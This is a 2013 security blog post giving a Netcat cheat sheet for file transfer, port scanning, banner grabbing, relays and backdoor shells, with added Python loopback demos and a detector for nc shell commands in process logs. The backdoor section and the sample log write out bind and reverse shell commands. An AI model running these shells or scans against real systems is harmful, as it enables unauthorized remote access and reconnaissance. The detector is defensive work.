What is it? @.@

Here is the place where I record some tactics about wargames, systems, and other security issues.

2013-07-20

Netcat Cheat Sheet


[Fundamentals]

1. Fundamental Netcat Client:
# nc [TargetIPaddr] [TargetPort]

Connect to an arbitrary port [TargetPort] at IP Address [TargetIPaddr]

2. Fundamental Netcat Listener:
# nc -l -p [LocalPort]

Create a Netcat listener on arbitrary local port [LocalPort]

# nc -lvk -p [LocalPort]

To force Netcat to keep listening after the first connection ends, add the -k flag (present in the OpenBSD netcat and in Ncat; the original Hobbit netcat does not have it). Adding -v (verbose) makes Netcat report on stderr who is connecting, which matters with -k because several different hosts may connect to you in turn.

Both the client and listener take input from STDIN, and print responses to STDOUT.

[File Transfer]

1. Push a file 
(1) Connect & Upload (Being a Netcat Client):
# nc [TargetIPaddr] [TargetPort] < [InFile]

Push the file [InFile] to IP address [TargetIPaddr] on port [TargetPort]

(2) Listen & Upload (Being a Netcat Listener):
# nc -l -p [LocalPort] < [InFile]

Listen on [LocalPort], prepare to push [InFile]

2. Pull a file 
(1) Listen & Download (Being a Netcat Listener):
# nc -l -w3 -p [LocalPort] > [OutFile]

Pull a file being pushed to you on local port [LocalPort] and store it in [OutFile], closing the connection after 3 seconds

(2) Connect & Download (Being a Netcat Client):
# nc -w3 [TargetIPaddr] [TargetPort] > [OutFile]

Connect to IP address [TargetIPaddr] on port [TargetPort] and write whatever is received into [OutFile], closing the connection after 3 seconds

Adjust the wait time from 3 to any number of seconds that is ample time to transfer the specified file.
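As an added example (Python sockets on loopback, not the cheat sheet's own nc commands), the push/pull pair above re-implemented so the effect of the -w wait time can be watched: the listener gives up after wait_seconds of silence just as -w does, and the sender can be made to stall between chunks. Netcat itself never checks that the whole file arrived, so the example compares SHA-256 digests of what was sent and what was written. The payloads, pause and port choice are constructed for the demonstration.

```python
import hashlib
import socket
import threading
import time

def sha256_bytes(data):
    return hashlib.sha256(data).hexdigest()

def start_listener(wait_seconds):
    """Listener half of 'nc -l -w3 -p [LocalPort] > [OutFile]'.

    Binds an ephemeral loopback port, accepts one connection and collects
    what is sent until the peer closes or nothing arrives for wait_seconds
    (the -w behaviour). Returns (port, result, thread); the thread fills
    result["data"] when it finishes.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]
    result = {"data": b"", "timed_out": False}

    def serve():
        conn, _ = srv.accept()
        srv.close()
        conn.settimeout(wait_seconds)
        chunks = []
        try:
            while True:
                chunk = conn.recv(65536)
                if not chunk:           # sender closed: normal end of transfer
                    break
                chunks.append(chunk)
        except socket.timeout:          # idle longer than -w: give up, as nc does
            result["timed_out"] = True
        finally:
            conn.close()
        result["data"] = b"".join(chunks)

    t = threading.Thread(target=serve, daemon=True)
    t.start()
    return port, result, t

def push_bytes(port, payloads, pause=0.0):
    """Client half of 'nc [TargetIPaddr] [TargetPort] < [InFile]'.

    Sends the payloads in order, sleeping `pause` seconds between them to
    model a slow sender, then closes (nc closes once its STDIN hits EOF).
    """
    c = socket.create_connection(("127.0.0.1", port))
    try:
        for i, p in enumerate(payloads):
            if i and pause:
                time.sleep(pause)
            c.sendall(p)
    except OSError:
        pass                            # listener already hung up (-w expired)
    finally:
        c.close()

def transfer(payloads, wait_seconds, pause=0.0):
    """Run one push/pull and report whether the received bytes match."""
    sent = b"".join(payloads)
    port, result, t = start_listener(wait_seconds)
    push_bytes(port, payloads, pause)
    t.join(timeout=wait_seconds + 5)
    return {
        "ok": sha256_bytes(result["data"]) == sha256_bytes(sent),
        "received": len(result["data"]),
        "expected": len(sent),
        "timed_out": result["timed_out"],
    }

if __name__ == "__main__":
    print(transfer([b"hello " * 1000, b"world\n"], wait_seconds=3.0))
    # A sender that stalls for longer than -w loses the tail of the file:
    print(transfer([b"part one\n", b"part two\n"], wait_seconds=0.2, pause=1.5))
```

The second call is the failure mode the sentence above warns about: the listener's -w timer expires during the sender's pause, the file on disk is silently short, and only the digest comparison reveals it. Compare checksums on both ends after any nc transfer.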

[TCP Port Scanner]

1. Port scan an IP Address:
# nc -v -n -z -w1 [TargetIPaddr] [StartPort]-[EndPort]

Attempt to connect to each port in a range from [StartPort] to [EndPort] on IP Address [TargetIPaddr], running verbosely (-v on Linux, -vv on Windows), not resolving names (-n), without sending any data (-z), and waiting no more than 1 second for a connection to occur (-w1)

The randomize ports (-r) switch can be used to randomly choose port numbers in the range to be queried, instead of the default behavior of counting down from the last port to the first.

[TCP Banner Grabber]

1. Grab the banner of any TCP service running on an IP Address from Linux:
# echo "" | nc -v -n -w1 [TargetIPaddr] [StartPort]-[EndPort]

Attempt to connect to each port in a range from [StartPort] to [EndPort] on IP Address [TargetIPaddr] running verbosely (-v on Linux, -vv on Windows), not resolving names (-n), and waiting no more than 1 second for a connection to occur (-w1). Then send a blank string to the open port and print out any banner received in response.

Add -p [Port] to specify a source port. The randomize ports (-r) switch can be used to randomly choose port numbers in the range to be queried, instead of the default behavior of counting down from the last port to the first.
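Added example (Python, not nc) covering both the scanner and the banner grabber above: probe() does what one nc connection does, either -z style (connect, send nothing, close) or banner style (send the blank line that echo "" supplies and read whatever comes back within the -w timeout), and scan_range() walks a port range from the last port down, or shuffled when the -r behaviour is requested. Two constructed loopback services stand in for real daemons, one that greets on connect (SMTP/FTP style) and one that only answers after receiving input (HTTP style); host, ports and banners are all assumptions for the demonstration.

```python
import random
import socket
import threading

def start_fake_service(greeting=b"", reply=b""):
    """Constructed loopback service standing in for a real daemon.

    greeting: sent as soon as a client connects (SMTP/FTP style banner).
    reply:    sent only after the client has sent something (HTTP style).
    Either way the service reads one chunk from the client before closing,
    as a real daemon would. Returns the ephemeral port it listens on.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            conn, _ = srv.accept()
            conn.settimeout(2.0)
            try:
                if greeting:
                    conn.sendall(greeting)
                data = conn.recv(1024)      # b"" if the client just closed (-z)
                if reply and data:
                    conn.sendall(reply)
            except OSError:                 # client gone or idle too long
                pass
            finally:
                conn.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]

def probe(host, port, timeout=1.0, payload=None):
    """One connection attempt against host:port.

    payload None mirrors 'nc -v -n -z -w1': connect, send nothing, close.
    payload of a newline mirrors 'echo "" | nc -v -n -w1': send a blank line
    and collect whatever arrives within `timeout` seconds as the banner.
    Returns (is_open, banner).
    """
    try:
        s = socket.create_connection((host, port), timeout=timeout)
    except OSError:                         # refused, unreachable or timed out
        return False, b""
    banner = b""
    try:
        if payload is not None:
            s.sendall(payload)
            s.settimeout(timeout)
            while True:
                try:
                    chunk = s.recv(4096)
                except socket.timeout:      # service stayed silent: no banner
                    break
                if not chunk:               # service closed after answering
                    break
                banner += chunk
    except OSError:
        pass
    finally:
        s.close()
    return True, banner

def scan_range(host, start, end, timeout=1.0, randomize=False, grab_banner=False):
    """Probe every port from start to end inclusive.

    Like nc, ports are tried from the last down to the first unless
    randomize (the -r switch) shuffles the order. Results are keyed by
    port, so the probing order does not change what is reported.
    """
    ports = list(range(end, start - 1, -1))
    if randomize:
        random.shuffle(ports)
    payload = b"\n" if grab_banner else None
    results = {}
    for p in ports:
        is_open, banner = probe(host, p, timeout, payload)
        results[p] = {"open": is_open, "banner": banner}
    return results

if __name__ == "__main__":
    smtp_like = start_fake_service(greeting=b"220 mail.example.test ESMTP\r\n")
    http_like = start_fake_service(reply=b"HTTP/1.0 400 Bad Request\r\n")
    for p in (smtp_like, http_like):
        print(p, probe("127.0.0.1", p, payload=b"\n"))
    for p, r in sorted(scan_range("127.0.0.1", smtp_like - 1, smtp_like + 1,
                                  randomize=True, grab_banner=True).items()):
        print(p, "open" if r["open"] else "closed", r["banner"])
```

The HTTP-style service shows why the blank line matters: with -z alone it reports open but returns nothing, and only after input does it identify itself. On the defending side, both probe styles leave the same trace, a completed TCP handshake followed by an immediate close, which is what connection-log based scan detection keys on.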


[Netcat Relays on Windows]

To start, enter a temporary directory where we will be creating a series of .bat files:
C:\> cd C:\temp

1. Relay from a Netcat Listener to a Netcat Client:
C:\temp> echo nc [TargetIPaddr] [TargetPort] > relay.bat
C:\temp> nc -l -p [LocalPort] -e relay.bat

Create a relay that will route packets from the local port [LocalPort] to a Netcat Client connected to [TargetIPaddr] on port [TargetPort]

2. Relay from Netcat Client to Netcat Client:
C:\temp> echo nc [TargetIPaddr] [TargetPort] > relay.bat
C:\temp> nc [SourceIPaddr] [SourcePort] -e relay.bat

Create a relay that will route packets from the connection to [SourceIPaddr] on port [SourcePort] to a Netcat Client connected to [TargetIPaddr] on port [TargetPort]

3. Relay from Netcat Listener to Netcat Listener:
C:\temp> echo nc -l -p [LocalPort2] > relay.bat
C:\temp> nc -l -p [LocalPort1] -e relay.bat

Create a relay that will route packets from any connection connected to [LocalPort1] to any connection connected to [LocalPort2]

[Netcat Relays on Linux]

To start, enter a temporary directory and create a FIFO called backpipe:
# cd /tmp
# mknod backpipe p

mknod - make block or character special files
mknod [OPTION]... NAME TYPE [MAJOR MINOR]
TYPE p: create a FIFO (named pipe)

1. Relay from a Netcat Listener to a Netcat Client:
# nc -l -p [LocalPort] 0<backpipe | nc [TargetIPaddr] [TargetPort] | tee backpipe

0: STDIN, 1: STDOUT, 2: STDERR
tee - read from standard input and write to standard output and files
tee [OPTION]... [FILE]...

Create a relay that will route packets from the local port [LocalPort] to a Netcat Client connected to [TargetIPaddr] on port [TargetPort]. The pipe carries traffic forward (the listener's output becomes the client's STDIN); the FIFO carries it back: tee copies the client's output both to STDOUT and into backpipe, which the listener reads as its STDIN (0<backpipe).

2. Relay from Netcat Client to Netcat Client:
# nc [SourceIPaddr] [SourcePort] 0<backpipe | nc [TargetIPaddr] [TargetPort] | tee backpipe

Create a relay that will route packets from the connection to [SourceIPaddr] on port [SourcePort] to a Netcat Client connected to [TargetIPaddr] on port [TargetPort]

3. Relay from Netcat Listener to Netcat Listener:
# nc -l -p [LocalPort1] 0<backpipe | nc -l -p [LocalPort2] | tee backpipe

Create a relay that will route packets from any connection connected to [LocalPort1] to any connection connected to [LocalPort2]
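The pipe-plus-FIFO plumbing in the three Linux relays above is one way to get bytes moving in both directions between two connections; the same relay can be written without the FIFO by pumping each direction in its own thread. Added example in Python (not from the cheat sheet, and not how nc itself is built): a listener-to-client relay on loopback, with a constructed echo service standing in for [TargetIPaddr]:[TargetPort] so the round trip can be checked, plus the case where the target is down. All ports and messages are assumptions for the demonstration.

```python
import socket
import threading

def _pump(src, dst):
    """Copy bytes src -> dst until EOF, then pass the EOF on with shutdown()."""
    try:
        while True:
            data = src.recv(65536)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass

def start_relay(target_host, target_port):
    """Listener-to-client relay: the job the pipe and backpipe FIFO do above.

    Accepts one client on an ephemeral loopback port, connects onward to
    target_host:target_port and pumps each direction in its own thread.
    Returns the local port to connect to.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve():
        client, _ = srv.accept()
        srv.close()
        try:
            upstream = socket.create_connection((target_host, target_port), timeout=5)
        except OSError:                 # target unreachable: drop the client too
            client.close()
            return
        upstream.settimeout(None)
        threading.Thread(target=_pump, args=(client, upstream), daemon=True).start()
        _pump(upstream, client)         # returns when the target closes
        client.close()
        upstream.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]

def start_echo_service():
    """Constructed stand-in for [TargetIPaddr]:[TargetPort]: echoes its input."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            conn, _ = srv.accept()
            with conn:
                _pump(conn, conn)

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]

def send_through_relay(port, message, timeout=5.0):
    """Client of the relay: send message, half-close, collect the reply."""
    out = b""
    try:
        with socket.create_connection(("127.0.0.1", port), timeout=timeout) as c:
            c.sendall(message)
            c.shutdown(socket.SHUT_WR)
            while True:
                chunk = c.recv(4096)
                if not chunk:
                    break
                out += chunk
    except OSError:                     # reset by a relay whose target was down
        pass
    return out

if __name__ == "__main__":
    echo_port = start_echo_service()
    relay_port = start_relay("127.0.0.1", echo_port)
    print(send_through_relay(relay_port, b"ping via relay\n"))
```

Note what the relay does not do: it neither inspects nor authenticates the bytes it moves, and the target only ever sees the relay's address. That is why, on systems you administer, an unexpected listening nc whose command line or traffic points at another host deserves the same attention as the backdoor shells in the next section.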

[Backdoor Shells]

1. Listening backdoor shell on Linux:
# nc -l -p [LocalPort] -e /bin/bash

2. Listening backdoor shell on Windows:
C:\> nc -l -p [LocalPort] -e cmd.exe

Create a shell on local port [LocalPort] that can then be connected to using a fundamental client

3. Reverse backdoor shell on Linux:
# nc [YourIPaddr] [YourPort] -e /bin/bash

4. Reverse backdoor shell on Windows:
C:\> nc [YourIPaddr] [YourPort] -e cmd.exe

Create a reverse shell that will attempt to connect to [YourIPaddr] on port [YourPort]. This shell can then be captured using a fundamental listener.
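The four command lines above are exactly what a defender wants to pick out of process telemetry. As an added example (not part of the cheat sheet), a small Python detector that classifies a netcat invocation as a listening (bind) shell or a reverse shell whenever it carries a program-execution flag, run over constructed process-creation events. The event format, host names, ports, IP addresses and the list of netcat binary names are all assumptions for the demonstration; -e is the flag the cheat sheet uses, and -c, --exec and --sh-exec are the Ncat equivalents. It tokenizes on whitespace, so with real sensors use the argv array they record rather than a re-joined command string.

```python
import re

# Binary names treated as netcat (constructed list; extend for your fleet).
NETCAT_NAMES = {"nc", "ncat", "netcat", "nc.exe", "ncat.exe",
                "nc.traditional", "nc.openbsd"}
# -e is what the cheat sheet uses; -c/--sh-exec/--exec are Ncat's equivalents.
EXEC_FLAGS = ("-e", "--exec", "-c", "--sh-exec")
# Flags that consume the following token as their value.
VALUE_FLAGS = {"-p", "-w", "-s", "-i"} | set(EXEC_FLAGS)

# Constructed process-creation events in a simple key=value line format.
SAMPLE_LOG = """\
2013-07-20T10:01:02Z web01 pid=4123 uid=33 cmdline="nc -l -p 4444 -e /bin/bash"
2013-07-20T10:01:05Z web01 pid=4130 uid=33 cmdline="nc 198.51.100.7 53 -e /bin/bash"
2013-07-20T10:02:11Z ws07 pid=988 uid=1001 cmdline="C:\\tools\\nc.exe -l -p 31337 -e cmd.exe"
2013-07-20T10:03:40Z build02 pid=2210 uid=1000 cmdline="nc -v -n -z -w1 10.0.0.5 20-25"
2013-07-20T10:04:01Z build02 pid=2215 uid=1000 cmdline="nc -lvk -p 8080"
2013-07-20T10:05:13Z web01 pid=4201 uid=0 cmdline="ncat -l 9001 --sh-exec /bin/sh"
2013-07-20T10:06:00Z web01 pid=4210 uid=33 cmdline="/usr/bin/python3 app.py"
"""

LOG_RE = re.compile(
    r'^(?P<ts>\S+)\s+(?P<host>\S+)\s+pid=(?P<pid>\d+)\s+uid=\d+\s+cmdline="(?P<cmd>[^"]*)"')

def parse_nc_argv(argv):
    """Split netcat arguments into options and positional (host/port) tokens.

    Single-dash clusters such as -lvk are expanded to -l, -v, -k. Values of
    VALUE_FLAGS are stored as strings; bare switches are stored as True.
    """
    opts, positional = {}, []
    i = 1
    while i < len(argv):
        tok = argv[i]
        if tok in VALUE_FLAGS and i + 1 < len(argv):
            opts[tok] = argv[i + 1]
            i += 2
            continue
        if tok.startswith("--"):
            opts[tok] = True
        elif tok.startswith("-") and len(tok) > 1:
            for ch in tok[1:]:
                opts["-" + ch] = True
        else:
            positional.append(tok)
        i += 1
    return opts, positional

def classify_netcat(cmdline):
    """Return a finding dict for a netcat command line that executes a
    program, or None when it is not netcat or has no exec flag."""
    argv = cmdline.split()              # whitespace tokenizer: fine for these samples
    if not argv:
        return None
    prog = argv[0].replace("\\", "/").rsplit("/", 1)[-1].lower()
    if prog not in NETCAT_NAMES:
        return None
    opts, positional = parse_nc_argv(argv)
    exec_target = next((opts[f] for f in EXEC_FLAGS if isinstance(opts.get(f), str)), None)
    if exec_target is None:
        return None                     # plain client, listener, scan or transfer
    if opts.get("-l") is True:          # listening (bind) shell: -l together with exec
        port = opts.get("-p") or (positional[0] if positional else None)
        return {"kind": "bind_shell", "exec": exec_target, "listen_port": port}
    remote = tuple(positional[:2]) if len(positional) >= 2 else None
    return {"kind": "reverse_shell", "exec": exec_target, "remote": remote}

def scan_log(text):
    """Run the classifier over every event line and collect findings."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        finding = classify_netcat(m.group("cmd"))
        if finding:
            finding.update(ts=m.group("ts"), host=m.group("host"), pid=int(m.group("pid")))
            findings.append(finding)
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f)
```

Of the seven sample events only the four carrying an exec flag are reported; the scan, the -lvk listener and the unrelated process are left alone, which keeps the rule precise enough to alert on. Pair it with network telemetry: a bind shell shows up as an unexpected listening port, a reverse shell as an outbound connection from a shell-spawning process.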

1 comment:

  1. Keep up the educational work, man! I'm going to visit this blog more often.
